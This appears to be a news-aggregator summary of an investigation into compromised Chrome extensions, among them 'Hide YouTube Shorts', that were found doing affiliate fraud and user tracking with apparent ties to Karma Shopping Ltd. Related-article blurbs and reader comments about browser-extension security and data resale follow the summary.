The Karma Connection in Chrome Web Store
Recent investigations reveal that compromised Chrome extensions, including "Hide YouTube Shorts," engage in affiliate fraud and user tracking, raising serious data privacy concerns and potential GDPR violations.
Read original article
Recent investigations have revealed that several Chrome extensions, including the "Hide YouTube Shorts" extension, have been compromised and are now engaging in malicious activities such as affiliate fraud and user tracking. The extensions, which changed ownership in mid-2023, were found to contain undisclosed components that send user data to an Amazon cloud server. Among these extensions, the Karma shopping assistant, developed by Karma Shopping Ltd., has been identified as potentially linked to the malicious activities, sharing backend infrastructure and code with the other extensions. Karma Shopping Ltd. has been in operation since 2013 and has a significant workforce and venture capital backing. The company openly admits to collecting and selling users' browsing profiles in its privacy policy. The malicious extensions employ deceptive coding practices to mask their true functionality, which includes tracking user behavior across various websites and generating affiliate commissions. Despite the apparent connections, Karma Shopping Ltd. has not responded to inquiries regarding its relationship with the malicious extensions. The situation raises concerns about data privacy and the ethical implications of such data collection practices, particularly in light of GDPR regulations.
- Several Chrome extensions have been found to engage in malicious activities after changing ownership.
- Karma Shopping Ltd. is linked to these extensions and admits to collecting and selling user browsing data.
- The extensions use deceptive coding to mask their tracking and affiliate fraud functionalities.
- Karma Shopping Ltd. has not responded to inquiries about its involvement with the malicious extensions.
- The situation highlights significant concerns regarding data privacy and compliance with regulations like GDPR.
Related
Universal Code Execution by Chaining Messages in Browser Extensions
Researchers demonstrate universal code execution in browser extensions by exploiting messaging APIs, bypassing security measures. Vulnerabilities in extensions can compromise millions of users, allowing access to sensitive data and enabling arbitrary command execution.
Chrome's Manifest V3, and its changes for ad blocking, are coming real soon
Google Chrome's Manifest V3 will soon be mandatory, affecting ad blockers like uBlock Origin. Users face warnings about V2 support loss, while a "Lite" version will comply with new guidelines.
Google will disable some of its own Chrome extensions soon
Google is disabling several Chrome extensions as it transitions to a new system, affecting all Chromium-based browsers. Users can check compatibility and consider alternatives like Firefox.
FTC Report Confirms: Commercial Surveillance Is Out of Control
The FTC report reveals extensive commercial surveillance by major tech companies, highlighting invasive data collection practices, lack of transparency, and the need for urgent legislative action to protect consumer privacy.
Escaping the Chrome Sandbox Through DevTools
Two vulnerabilities in Chromium allow malicious extensions to escape the sandbox and execute commands on users' PCs. The author received a $20,000 reward for reporting these significant security risks.
9 commentsSensor Tower (https://sensortower.com/) makes a lot of popular extensions, like StayFocusd https://www.stayfocusd.com/. They seem to resell ad data (in violation of [1]?) and ship likely obfuscated code [2] (in violation of [3]?), but there's no enforcement or even clear reporting mechanism.
[1] https://developer.chrome.com/docs/webstore/program-policies/...
[2] https://robwu.nl/crxviewer/?crx=https%3A%2F%2Fclients2.googl...
[3] https://developer.chrome.com/docs/webstore/program-policies/...
In its most innocuous form, this is stuff like SimilarWeb (which is like a more advanced Google Trends), but in the B2B world, it's also custom enterprise reports that are like "how many people that use our bank at xyz also use any other bank at this array of domains and which are most common?"
And then from time to time I have a dedicated profile on Chrome to use other extensions that might be useful, but I don't do day-to-day browsing there.
How is it, in 2024, users can still blindly install malicious software directly into their browser from a web store with Google’s name at the top of it?
This goes to show even the most cautious and conscientious of users can get caught out by their extension changing hands. What, is Google expecting us to review our extensions, and their permissions, and their authors, and their authors’ associated businesses, every time we want to use our computer?
Additionally, are we even able to review the source code of extensions if they are not open source?
Related
Universal Code Execution by Chaining Messages in Browser Extensions
Researchers demonstrate universal code execution in browser extensions by exploiting messaging APIs, bypassing security measures. Vulnerabilities in extensions can compromise millions of users, allowing access to sensitive data and enabling arbitrary command execution.
Chrome's Manifest V3, and its changes for ad blocking, are coming real soon
Google Chrome's Manifest V3 will soon be mandatory, affecting ad blockers like uBlock Origin. Users face warnings about V2 support loss, while a "Lite" version will comply with new guidelines.
Google will disable some of its own Chrome extensions soon
Google is disabling several Chrome extensions as it transitions to a new system, affecting all Chromium-based browsers. Users can check compatibility and consider alternatives like Firefox.
FTC Report Confirms: Commercial Surveillance Is Out of Control
The FTC report reveals extensive commercial surveillance by major tech companies, highlighting invasive data collection practices, lack of transparency, and the need for urgent legislative action to protect consumer privacy.
Escaping the Chrome Sandbox Through DevTools
Two vulnerabilities in Chromium allow malicious extensions to escape the sandbox and execute commands on users' PCs. The author received a $20,000 reward for reporting these significant security risks.